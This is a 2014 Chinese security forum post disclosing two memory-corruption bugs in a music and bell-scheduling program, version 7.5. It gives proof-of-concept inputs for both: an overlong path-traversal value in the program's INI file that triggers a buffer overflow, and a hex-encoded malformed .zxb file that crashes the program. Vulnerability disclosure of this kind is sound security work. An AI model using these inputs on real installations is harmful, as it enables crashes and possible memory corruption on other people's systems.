-
-
[原创]深蓝音乐铃声播放系统 7.5 内存破坏漏洞两枚(缓冲区溢出漏洞+拒绝服务漏洞)
-
2014-6-8 12:26
2983
-
[原创]深蓝音乐铃声播放系统 7.5 内存破坏漏洞两枚(缓冲区溢出漏洞+拒绝服务漏洞)
程序下载地址http://www.skycn.com/soft/appid/13261.html 该存在2枚内存破坏漏洞。
漏洞1:处理某地址时由于地址过长,造成缓冲区溢出漏洞。
漏洞2:处理zxb文件错误,存在拒绝服务漏洞。
漏洞内容:
该存在2枚内存破坏漏洞。
漏洞1:处理某地址时由于地址过长,造成缓冲区溢出漏洞。
漏洞2:处理zxb文件错误,存在拒绝服务漏洞。
漏洞1poc: 打开程序路径下的SSPS.ini文件。把作息表一项改成
作息表=c:\program files\ssps\作息表\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\poc.zxb
其他不变。运行程序既触发漏洞。。
漏洞2:
poc 把下面文件以16进制形式保存为poc.ZXB
5A5842370B000000B2CEBFBCD7F7CFA2B1ED0001FFFFFFFFFFFF
运行即崩溃
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法